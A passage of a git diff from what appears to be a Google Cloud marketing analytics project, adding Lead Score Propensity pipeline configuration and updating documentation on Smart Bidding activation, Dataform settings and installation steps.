feature engineered labels that will be used for the Churn Propensity training pipeline. churn_propensity_label: project_id: "${project_id}" dataset: "feature_store" table_name: "churn_propensity_label" location: "${location}" table_description: "Churn Propensity Label table to be used for Model Prediction" + # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. + lead_score_propensity_label: + project_id: "${project_id}" + dataset: "feature_store" + table_name: "lead_score_propensity_label" + location: "${location}" + table_description: "Lead Score Propensity Label table to be used for Model Prediction" # Table containing the feature engineered dimensions that will be used for the Purchase Propensity training and inference pipeline. user_dimensions: project_id: "${project_id}" @@ -1671,6 +2090,13 @@ bigquery: table_name: "user_rolling_window_metrics" location: "${location}" table_description: "User Rolling Window Metrics table as part of the Feature Store for Purchase Propensity use case" + # Table containing the featured engineered rolling window metrics that will be used for the Purchase Propensity training and inference pipeline. + user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + table_name: "user_rolling_window_lead_metrics" + location: "${location}" + table_description: "User Rolling Window Lead Metrics table as part of the Feature Store for Lead Score Propensity use case" # Table containing the feature engineered all users metrics that will be used for the Customer Lifetime Value training and inference pipeline. user_scoped_lifetime_metrics: project_id: "${project_id}" @@ -1720,14 +2146,16 @@ bigquery: churn_propensity_query_template: none: none # This is a query template to be used by the Activation application, so there is no configuration to be applied. + lead_score_propensity_query_template: + none: none + # This is a query template to be used by the Activation application, so there is no configuration to be applied. cltv_query_template: none: none create_gemini_model: project_id: "${project_id}" dataset: "gemini_insights" model_name: "gemini_1_5_pro" - region: lower("${cloud_region}") - connection_name: "vertex_ai" + connection_name: "vertex_ai_conn" region: "${location}" endpoint_name: "gemini-1.5-pro-001" # This is a stored procedure that CALLs the Aggregated Value Based Bidding Training Preparation stored procedure. @@ -1735,6 +2163,26 @@ bigquery: project_id: "${project_id}" dataset: "aggregated_vbb" stored_procedure: "aggregated_value_based_bidding_training_preparation" + # This is a stored procedure that CALLs the Lead Score Propensity Training Preparation stored procedure. + invoke_lead_score_propensity_training_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + stored_procedure: "lead_score_propensity_training_preparation" + # The `interval_max_date` parameter defines hwo many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window. + interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # `training_split_end_number` must be smaller then `validation_split_end_number`. + # This is a number out of 10 deciles, how many rows will belong to the `data_split` = TRAIN (Between 1 and `training_split_end_number`) + train_split_end_number: 5 + # This is a number out of 10 deciles, how many rows will belong to the `data_split` = VALIDATE (Between `training_split_end_number` and `validation_split_end_number`) + # The rest of the rows will belong to the `data_split` = TEST (Between `validation_split_end_number` and 10) + validation_split_end_number: 8 + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + target_event: "${non_ecomm_target_event}" # This is a stored procedure that CALLs the Purchase Propensity Training Preparation stored procedure. invoke_purchase_propensity_training_preparation: project_id: "${project_id}" @@ -1754,7 +2202,7 @@ bigquery: validation_split_end_number: 8 mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" - # This is a stored procedure that CALLs the Purchase Propensity Training Preparation stored procedure. + # This is a stored procedure that CALLs the Churn Propensity Training Preparation stored procedure. invoke_churn_propensity_training_preparation: project_id: "${project_id}" dataset: "churn_propensity" @@ -1822,6 +2270,11 @@ bigquery: stored_procedure: "auto_audience_segmentation_training_preparation" # The `lookback_days` parameter is the number of days to look back for training data. lookback_days: 15 + # This is a stored procedure that CALLs the Lead Score Propensity Inference Inference Preparation stored procedure. + invoke_lead_score_propensity_inference_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + stored_procedure: "lead_score_propensity_inference_preparation" # This is a stored procedure that CALLs the Purchase Propensity Inference Inference Preparation stored procedure. invoke_purchase_propensity_inference_preparation: project_id: "${project_id}" @@ -1945,6 +2398,23 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 180 + # This is a stored procedure that CALLs the Lead Store Propensity Label Backfill stored procedure. + invoke_backfill_lead_score_propensity_label: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + insert_table: "lead_score_propensity_label" + # The `interval_max_date` parameter defines hwo many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window. + interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 5 + target_event: "${non_ecomm_target_event}" # This is a stored procedure that CALLs the Purchase Propensity Label Backfill stored procedure. invoke_backfill_purchase_propensity_label: mds_project_id: "${mds_project_id}" @@ -2014,6 +2484,26 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 30 + # This is a stored procedure that CALLs the User Rolling Window Lead Metrics Backfill stored procedure. + invoke_backfill_user_rolling_window_lead_metrics: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + insert_table: "user_rolling_window_lead_metrics" + # The `interval_max_date` parameter defines hwo many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window. + interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 5 + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} # This is a stored procedure that CALLs the User Scoped Metrics Backfill stored procedure. invoke_backfill_user_scoped_metrics: mds_project_id: "${mds_project_id}" @@ -2079,6 +2569,16 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_input_date: 180 + # This is a stored procedure that CALLs the Lead Score Propensity Label stored procedure. + invoke_lead_score_propensity_label: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + stored_procedure: "lead_score_propensity_label" + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_input_date: 1 # This is a stored procedure that CALLs the Purchase Propensity Label stored procedure. invoke_purchase_propensity_label: mds_project_id: "${mds_project_id}" @@ -2171,6 +2671,14 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 180 + # This is a stored procedure that CALLs the User Rolling Window Metrics stored procedure. + invoke_user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + stored_procedure: "user_rolling_window_lead_metrics" + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 15 # This is a stored procedure that CALLs the User Scoped Metrics stored procedure. invoke_user_scoped_metrics: project_id: "${project_id}" @@ -2182,10 +2690,11 @@ bigquery: # This section sets the parameters for the features, training and inference procedures that insert data into tables and views to be used for # training and prediction. # There is no strict recommendation on the right parameters that will maximize the models performance, however here are some back of the envelope numbers. - # Purchase Propensity model: 1 month-2 years for dates interval. From Xk - 10M users. - # Customer LTV model: 6 months-2 years for dates interval. From Xk - 10M users. - # Audience Segmentation / Auto Audience Segmentation models: 1 month-1 year for dates interval. From XXX - 10M users. - # Aggregated VBB model: 1000 days - 2000 days + # Lead Score Propensity model: 2 weeks-1 year for dates interval. From Xk - 1M users. + # Purchase Propensity model: 1 month-2 years for dates interval. From Xk - 1M users. + # Customer LTV model: 6 months-2 years for dates interval. From Xk - 1M users. + # Audience Segmentation / Auto Audience Segmentation models: 1 month-1 year for dates interval. From XXX - 1M users. + # Aggregated VBB model: 100 days - 2000 days # Note: For Aggregated VBB, it's common to duplicate rows to that training dataset size reaches at least 1k rows for AutoML to train a model. # If that is your case, this is not a problem since typically duplicated rows has a similar effect as of training the model for more epochs. procedure: @@ -2273,6 +2782,18 @@ bigquery: expiration_duration_hours: 168 custom_start_date: "'2023-01-01'" custom_end_date: "NULL" + # This is the stored procedure that calculates the label column for the Lead Score Propensity use case. + # The label represents wether a user will make a lead score over a period of time. + # Typically, looking at a period of 1 day in the future. + # The granularity level is per user per day. + lead_score_propensity_label: + project_id: "${project_id}" + dataset: "feature_store" + name: "lead_score_propensity_label" + insert_table: "lead_score_propensity_label" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + target_event: "${non_ecomm_target_event}" # This is the stored procedure that calculates the label column for the Purchase Propensity use case. # The label represents wether a user will make a purchase over a period of time. # Typically, looking at a period of 15 to 30 days in the future. @@ -2285,7 +2806,7 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" # This is the stored procedure that calculates the label column for the Churn Propensity use case. - # The label represents wether a user will make a purchase over a period of time. + # The label represents wether a user will churn over a period of time. # Typically, looking at a period of 30 days in the future. # The granularity level is per user per day. churn_propensity_label: @@ -2304,6 +2825,27 @@ bigquery: # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. # There is a minimum number of examples rows of 1000 and the maximum is as much as it fits in memory, overall consensus is that for ML models # you will provide at maximum a couple of millions of rows. + lead_score_propensity_training_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + name: "lead_score_propensity_training_preparation" + insert_table: "lead_score_propensity_training_full_dataset" + feature_store_project_id: "${project_id}" + feature_store_dataset: "feature_store" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + expiration_duration_hours: 168 + custom_start_date: "'2024-01-01'" + custom_end_date: "NULL" + target_event: "${non_ecomm_target_event}" + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} + # This is the stored procedure that collects the features and prepare the examples rows to train a model. + # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. + # There is a minimum number of examples rows of 1000 and the maximum is as much as it fits in memory, overall consensus is that for ML models + # you will provide at maximum a couple of millions of rows. purchase_propensity_training_preparation: project_id: "${project_id}" dataset: "purchase_propensity" @@ -2314,7 +2856,7 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" expiration_duration_hours: 168 - custom_start_date: "'2023-01-01'" + custom_start_date: "'2024-01-01'" custom_end_date: "NULL" # This is the stored procedure that collects the features and prepare the examples rows to train a model. # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. @@ -2384,6 +2926,20 @@ bigquery: insert_table: "user_rolling_window_metrics" mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" + # This is the stored procedure that UPSERTs new look back rolling windows metrics rows daily. + # The granularity level is per user per day. + # These metrics are used for the Lead Score Propensity use case. + user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + name: "user_rolling_window_lead_metrics" + insert_table: "user_rolling_window_lead_metrics" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} # This is the stored procedure that UPSERTs new aggregated users metrics rows daily. # The granularity level is per day, whereas the calculations take into consideration all users. # These metrics are used for the Customer Lifetime Value use case. @@ -2435,6 +2991,20 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" # This is the stored procedure that collects the features and prepare the examples rows for daily prediction. + lead_score_propensity_inference_preparation: + project_id: "${project_id}" + mds_dataset: "${mds_dataset}" + dataset: "lead_score_propensity" + name: "lead_score_propensity_inference_preparation" + feature_store_project_id: "${project_id}" + feature_store_dataset: "feature_store" + insert_table: "lead_score_propensity_inference_preparation" + expiration_duration_hours: 168 + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} + # This is the stored procedure that collects the features and prepare the examples rows for daily prediction. purchase_propensity_inference_preparation: project_id: "${project_id}" mds_dataset: "${mds_dataset}" diff --git a/docs/activation.md b/docs/activation.md index 79e42d00..5bc51095 100644 --- a/docs/activation.md +++ b/docs/activation.md @@ -38,12 +38,14 @@ For each use case, a corresponding SQL query template dictates how prediction va | Use Case | Query Template | | -------- | --------- | | Purchase Propensity | [purchase_propensity_query_template.sqlx](../templates/activation_query/purchase_propensity_query_template.sqlx)| +| Purchase Propensity for Smart Bidding | [purchase_propensity_vbb_query_template.sqlx](../templates/activation_query/purchase_propensity_vbb_query_template.sqlx)| | Customer Lifetime Value | [cltv_query_template.sqlx](../templates/activation_query/cltv_query_template.sqlx) | | Demographic Audience Segmentation | [audience_segmentation_query_template.sqlx](../templates/activation_query/audience_segmentation_query_template.sqlx) | | Interest based Audience Segmentation | [auto_audience_segmentation_query_template.sqlx](../templates/activation_query/auto_audience_segmentation_query_template.sqlx) | | Churn Propensity | [churn_propensity_query_template.sqlx](../templates/activation_query/churn_propensity_query_template.sqlx)| -The [activation configuration](../templates/activation_type_configuration_template.tpl) file links the GA4 custom events with their corresponding query templates and [GA4 Measurement Protocol payload template](../templates/app_payload_template.jinja2) +**Note:** The dynamic fields in the query template need to be prefixed with `user_prop_` or `event_param_` prefix inorder for the activation process to parse the value into measurement protocol payload. + The payload have the following keys set based on the [payload reference documentation](https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference#payload_post_body): @@ -164,7 +166,117 @@ To build your custom audience, follow the [Create an audience guide](https://sup Now you have a custom audience that is automatically updated as new activation events are sent by the activation process. This custom audience can then be used for targeted remarketing campaigns in Google Ads or other platforms. Follow the [Share audiences guide](https://support.google.com/analytics/answer/12800258) to learn how to export your audience for use in external platforms. -**Important:** If you are using User Data Import only use the customer user properties and remove the custom event filtering. +**Important:** If you are using User Data Import only use the customer user properties and remove the custom event filtering. + +## Activation through Smart Bidding Strategy +To activate purchase propensity predictions via [Smart Bidding Strategy](https://support.google.com/google-ads/answer/7065882), we translate predicted decile segments into monetary values, sent as conversion events to GA4. This allows you to use Google Ads strategies for [maximizing conversion value](https://support.google.com/google-ads/answer/7684216) and [target ROAS](https://support.google.com/google-ads/answer/6268637) with custom event values as the target. + +This also allows you to use [Search Ads 360 bid strategies](https://support.google.com/searchads/answer/6231813?hl=en) + +### Configure translation values +This section explains how to configure the translation of purchase propensity predictions into monetary values for Smart Bidding. + +#### Understanding the Configuration File: +The [vbb_activation_configuration.jsonl](../templates/vbb_activation_configuration.jsonl) file controls how predicted deciles are converted into monetary values. It contains two key fields: + +- `value_norm`: Represents the typical or average transaction value for your GA4 property. This provides a baseline for calculating monetary values. +- `decile_multiplier`: An array of multipliers, one for each decile. These multipliers determine how much each decile is valued relative to the value_norm. + +#### Configuration Steps: + +1. Set `value_norm`: + - Open the [vbb_activation_configuration.jsonl](../templates/vbb_activation_configuration.jsonl) file. + - Locate the entry where `"activation_type":"purchase-propensity"`. + - Modify the `value_norm` field to reflect the average transaction value specific to your GA4 property. For example, if your average transaction value is $200, set `value_norm` to 200. + +1. Set `decile_multiplier`:s: + - For each decile (1 through 10), adjust the `multiplier` value to reflect how much you value users in that decile. + - A higher multiplier signifies a higher value. For example, a multiplier of 3.5 for decile 1 means you value users in that decile 3.5 times more than the average customer. + +**Important**: To exclude lower-value deciles from smart bidding, set their decile_multiplier to 0. This prevents predictions for those deciles from being sent to GA4. + +**Calculate multiplier example:** +The following example provide a way to use quantative analysis to derived the multiplier value for each decile. The query uses the prediction result table, which contains purchase propensity predictions and associated user data. +```sql +WITH + base AS ( + SELECT + user_ltv_revenue, + NTILE(10) OVER (ORDER BY prediction_prob DESC) AS p_p_decile, + FROM + `purchase_propensity.predictions_YYYY_MM_DDTHH_mm_ss_xxxx_xxx_view`), + segments_ltv AS ( + SELECT + SUM(user_ltv_revenue) AS seg_total_revenue, + AVG(user_ltv_revenue) AS avg_seg_revenue, + p_p_decile + FROM + base + GROUP BY + p_p_decile), + total_avg AS ( + SELECT + AVG(user_ltv_revenue) AS avg_revenue + FROM + base + WHERE + p_p_decile IS NOT NULL) +SELECT + sg.*, + sg.avg_seg_revenue/t.avg_revenue AS multiplier +FROM + segments_ltv AS sg, + total_avg AS t +ORDER BY + sg.p_p_decile ASC +``` +The SQL query calculates the `multiplier` by dividing `avg_seg_revenue` (average revenue per decile) by `avg_revenue` (overall average revenue) + +In the example `user_ltv_revenue` field is used, but you can replace it with other relevant numeric metrics depending on their business goals. For example, if the goal is to maximize conversions, the query could use a conversion value metric instead. The key is to choose a metric that aligns with the desired optimization strategy. + +**Example:** +```json +{"activation_type":"purchase-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +``` +In this example: +- The average transaction value (`value_norm`) is set to $150. +- Users in the top decile are valued 5.5 times higher than the average customer. +- Deciles 5 through 10 are excluded from smart bidding (`multiplier` is 0). + +**Important**: +- Maintain the exact formatting of the JSON file. Do not add extra lines or commas as this will cause errors when importing the configuration into BigQuery. +- The formula for calculating the final monetary value for each decile is:` value_norm * decile_multiplier`. + +### Upload configuration +This section outlines the process of uploading your Smart Bidding configuration to Google Cloud Storage (GCS) and then loading it into BigQuery for use in the activation pipeline. + +1. Run terraform apply to upload configuration into GCS bucket: + ``` + cd infrastructure/terraform + terraform apply -target=module.activation[0].google_storage_bucket_object.vbb_activation_configuration_file + ``` +1. Run [load_vbb_activation_configuration](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2sactivation!3sload_vbb_activation_configuration) stored procedure to load configuration into BigQeury + +1. Control the configuration in [vbb_activation_configuration](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!4m3!1s!2sactivation!3svbb_activation_configuration) BigQuery table + +### Send Smart Bidding activation events to GA4 +You can manually trigger a activation pipeline execution for Smart Bidding action by following [activation triggering process](#activation-process-triggering) where you set the `activation_type` value to `purchase-propensity-vbb-30-15` + +To configure the prediction pipeline to automatically trigger activation pipeline for Smart Bidding change the pipeline configuration parameter in [config.yaml.tftpl](../config/config.yaml.tftpl) +and set `vertex_ai.pipelines.purchase_propensity.prediction.pipeline_parameters.pubsub_activation_type` to `purchase-propensity-vbb-30-15` +and re-apply terraform to redeploy the pipeline: + ``` + cd infrastructure/terraform + terraform apply -target=module.pipelines[0].null_resource.compile_purchase_propensity_prediction_pipelines + ``` + +### Google Analytics configuration +After the activation events have been send it will take ruffly 24 hours for them to appear in the `Admin -> Events` view. Once you see `maj_purchase_propensity_vbb_30_15` showing up in the event list mark it as key event. +![alt text](images/vbb_mark_key_event.png) + +### Google Ads configuration + +Follow the [Set up Smart Bidding](https://support.google.com/google-ads/answer/10893605) guide to configure the bidding strategy to optimize for conversion value with `maj_purchase_propensity_vbb_30_15` as the conversion event. ## Monitoring & Troubleshooting The activation process logs all sent Measurement Protocol messages in log tables within the `activation` dataset in BigQuery. This includes both successful and failed transmissions, allowing you to track the progress of the activation, get number of events sent to GA4 and identify any potential issues. diff --git a/docs/data_store.md b/docs/data_store.md index 70a4b05e..f015d357 100644 --- a/docs/data_store.md +++ b/docs/data_store.md @@ -107,12 +107,11 @@ To deploy the Marketing Data Store, follow the pre-requisites and instructions i Next, after creating the Terraform variables file by making a copy from the template, set the Terraform variables to create the environments you need for Dataform. ```bash -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true +deploy_dataform = true +property_id = "PROPERTY_ID" ``` -When the `create_dev_environment` variable is set to `true`, a development environment will be created. When the `create_staging_environment` variable is set to `true`, a staging environment will be created. When the `create_prod_environment` variable is set to `true`, a production environment will be created. +When the `deploy_dataform` variable is set to `true`, a dataform workspace will be created. ![Dataform Repository](images/data_store_dataform_github_repository.png) After deploying the Marketing Data Store, the repository called `marketing_analytics` is created in Dataform. diff --git a/docs/images/YoutubeScreenshot.png b/docs/images/YoutubeScreenshot.png new file mode 100644 index 00000000..90f211a8 Binary files /dev/null and b/docs/images/YoutubeScreenshot.png differ diff --git a/docs/images/vbb_mark_key_event.png b/docs/images/vbb_mark_key_event.png new file mode 100644 index 00000000..fcc0a8e2 Binary files /dev/null and b/docs/images/vbb_mark_key_event.png differ diff --git a/infrastructure/README.md b/infrastructure/README.md index 07ec98cc..51e5c9d3 100644 --- a/infrastructure/README.md +++ b/infrastructure/README.md @@ -1,20 +1,71 @@ -# Marketing Analytics Jumpstart Installation Guide +# Marketing Analytics Jumpstart Step-by-Step Installation Guide ## Overview Marketing Analytics Jumpstart consists of several components - marketing data store (MDS), feature store, ML pipelines, -the activation pipeline and dashboards. This document describes the sequencing of installing these components. +the activation pipeline and dashboards. -## Prerequisites +This document describes the permission and data prerequisites for a successful installation and provides you with two routes to install the solution. These are design for advanced uses of the Marketing Analytics Jumpstart solution. + +**1) Guided Installation Tuturial of Terraform Modules on Cloud Shell** + + This route allows you to install and manage the solution components using our cloud-based Developer workspace. You will have the possibility to tailor the solution components to your needs. Allowing you to use only subcomponents of this solution. For instance, developers wanting to reuse their existing Marketing Data Store will prefer this installation method. + +**2) Manual Installation of Terraform Modules** + + This route allows you to install and manage the solution in any workspace (cloud, local machine, Compute engine instance). This is the prefered method for user who are contributing and extending this solution to implement new features or adapt it to specific business needs. This route must also be taken, in case you need to manage multiple brands installations, multiple tenants installations, multiple regions installations in a comprehensive manner. + +Once you have chosen your route, check the permissions and data prerequisites in detail. + +**Note:** If none of these routes are ideal for you, run this [installation notebook πŸ“”](https://colab.sandbox.google.com/github/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/notebooks/quick_installation.ipynb) on Google Colaboratory and leverage Marketing Analytics Jumpstart in under 30 minutes. + +## Permissions Prerequisites + +### Permissions to deploy infrastructure and access source data + +There are multiple ways to configure Google Cloud authentication for the Terraform installations. Terraform's Google +Provider [documentation](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +lists all possible options on how the authentication can be done. This installation guide assumes that will be using the +Application Default Credentials. You can change this by, for example, creating a dedicated service account and +setting `GOOGLE_IMPERSONATE_SERVICE_ACCOUNT` environment variable before you run Terraform scripts. We will refer to the +identity which is used in the Terraform scripts (your email or the dedicated service account email) the "Terraform +principal" for brevity. + +The Terraform principal will need to be granted certain permissions in different projects: + +* the Owner role in all projects where the solution is to be installed. Required to install products related to the + solution. +* the BigQuery [Data Owner role](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#required_roles) + on the datasets containing the GA4 and Ads data exports. Required to grant data read access to + a service account which will be created by the Terraform scripts. Follow the + BigQuery [documentation](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#grant_access_to_a_dataset) + on how to grant this permission on a dataset level. + +### Google Analytics 4 Configurations and Permissions + +The activation application uses sensitive information from the Google Analytics property, such as Measurement ID and API Secret. These information is stored temporarily on environment variables to be exported manually by the user. + +* A [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) and [API secret](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) collected from the Google Analytics UI. In this [article](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) you will find instructions on how to generate the API secret. +* Editor or Administrator role to the Google Analytics 4 account or property. In this [article](https://support.google.com/analytics/answer/9305587?hl=en#zippy=%2Cgoogle-analytics) you will find instructions on how to setup. + +## Data Prerequisites + +### Recommended data location ### Marketing Analytics Data Sources * Set up Google Analytics 4 Export to Bigquery. Please follow the - set-up [documentation](https://support.google.com/analytics/answer/9358801?hl=en). The current version of MDS doesn't - use streaming export tables. + set-up [documentation](https://support.google.com/analytics/answer/9358801?hl=en). Note that the current version of MDS doesn't + support streaming export tables. + + [![Google Analytics 4 BigQuery Export](https://img.youtube.com/vi/u4QlVsNh2Q4/0.jpg)](https://youtube.com/clip/Ugkxo955w1NlF8o5_EZmMdQO7UsxcFxnGt3j?si=zf1X4iEq_8IY_fu2) + + * Set up Google Cloud Data Transfer Service to export Google Ads to Bigquery. Follow these [instructions](https://cloud.google.com/bigquery/docs/google-ads-transfer). + [![Google Analytics 4 BigQuery Export](https://img.youtube.com/vi/svPy0o9r7eI/0.jpg)](https://youtube.com/clip/Ugkx9VT3yyM0GPwDXVVKcBMs2i7qbUmtOH74?si=p6MBZJE32x4EX8bT) + Make sure these exports use the same BigQuery location, either regional or multi-regional one. You can export the data into the same project or different projects - the MDS will be able to get the data from multiple projects. @@ -33,26 +84,6 @@ access control is desired multiple projects can be used: to accelerate the query originated from the dashboard. -### Permissions to create infrastructure and access source data - -There are multiple ways to configure Google Cloud authentication for the Terraform installations. Terraform's Google -Provider [documentation](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -lists all possible options on how the authentication can be done. This installation guide assumes that will be using the -Application Default Credentials. You can change this by, for example, creating a dedicated service account and -setting `GOOGLE_IMPERSONATE_SERVICE_ACCOUNT` environment variable before you run Terraform scripts. We will refer to the -identity which is used in the Terraform scripts (your email or the dedicated service account email) the "Terraform -principal" for brevity. - -The Terraform principal will need to be granted certain permissions in different projects: - -* the Owner role in all projects where the solution is to be installed. Required to install products related to the - solution. -* the BigQuery [Data Owner role](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#required_roles) - on the datasets containing the GA4 and Ads data exports. Required to grant data read access to - a service account which will be created by the Terraform scripts. Follow the - BigQuery [documentation](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#grant_access_to_a_dataset) - on how to grant this permission on a dataset level. - ### Dataform Git Repository MDS uses [Dataform](https://cloud.google.com/dataform) as the tool to run the data transformation. Dataform uses a @@ -78,28 +109,27 @@ copy the SQL scripts from a companion GitHub repo before running the Terraform s cd .. rm -rf marketing-analytics-jumpstart-dataform ``` -6. Generate a GitHub personal access token. It will be used by Dataform to access the repository. For details and +6. Generate a [GitHub personal access token](https://cloud.google.com/dataform/docs/connect-repository#connect-https). It will be used by Dataform to access the repository. For details and additional guidance regarding token type, security and require permissions see [Dataform documentation](https://cloud.google.com/dataform/docs/connect-repository#create-secret). You don't need to create a Cloud Secret - it will be done by the Terraform scripts. You will need to provide the Git URL and the access token to the Terraform scripts using a Terraform variable. -### Google Analytics 4 Configurations and Permissions +## Guided Installation Tutorial of Terraform Modules on Cloud Shell -The activation application uses sensitive information from the Google Analytics property, such as Measurement ID and API Secret. These information is stored temporarily on environment variables to be exported manually by the user. +Once all the permissions and data prerequisites are met, you can install these components following the step by step installation guide using the Cloud Shell Tutorial, by clicking the button below. -* A [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) and [API secret](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) collected from the Google Analytics UI. In this [article](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) you will find instructions on how to generate the API secret. -* Editor or Administrator role to the Google Analytics 4 account or property. In this [article](https://support.google.com/analytics/answer/9305587?hl=en#zippy=%2Cgoogle-analytics) you will find instructions on how to setup. +[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. -## Installing the MDS, ML pipelines, the feature Store, and the activation pipeline +## Manual Installation Guide of Terraform Modules -Once all the prerequisites are met you can install these components using Terraform scripts. +Once all the permissions and data prerequisites are met, you can install these components using Terraform scripts. Follow instructions in [terraform/README.md](terraform/README.md) -## Installing Dashboards +## Looker Studio Dashboard Installation -Looker Studio Dashboards can be installed by following instructions +Looker Studio Dashboard can be installed by following instructions in [../python/lookerstudio/README.md](../python/lookerstudio/README.md) - diff --git a/infrastructure/cloudshell/terraform-template.tfvars b/infrastructure/cloudshell/terraform-template.tfvars index d014be93..34fba65f 100644 --- a/infrastructure/cloudshell/terraform-template.tfvars +++ b/infrastructure/cloudshell/terraform-template.tfvars @@ -15,30 +15,194 @@ #################### INFRA VARIABLES ################################# tf_state_project_id = "${MAJ_DEFAULT_PROJECT_ID}" +main_project_id = "${MAJ_DEFAULT_PROJECT_ID}" google_default_region = "${MAJ_DEFAULT_REGION}" -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true - +deploy_dataform = true deploy_activation = true deploy_feature_store = true deploy_pipelines = true -deploy_monitoring = true +deploy_monitoring = false #################### DATA VARIABLES ################################# data_project_id = "${MAJ_MDS_PROJECT_ID}" destination_data_location = "${MAJ_MDS_DATA_LOCATION}" +property_id = "${MAJ_GA4_PROPERTY_ID}" data_processing_project_id = "${MAJ_MDS_DATAFORM_PROJECT_ID}" source_ga4_export_project_id = "${MAJ_GA4_EXPORT_PROJECT_ID}" source_ga4_export_dataset = "${MAJ_GA4_EXPORT_DATASET}" source_ads_export_data = [ { project = "${MAJ_ADS_EXPORT_PROJECT_ID}", dataset = "${MAJ_ADS_EXPORT_DATASET}", table_suffix = "${MAJ_ADS_EXPORT_TABLE_SUFFIX}" }] -#################### FEATEURE STORE VARIABLES ################################# +#################### FEATURE STORE VARIABLES ################################# feature_store_project_id = "${MAJ_FEATURE_STORE_PROJECT_ID}" +# These variables are going to become optional with future deployment +# List of comma separated events used in the lead 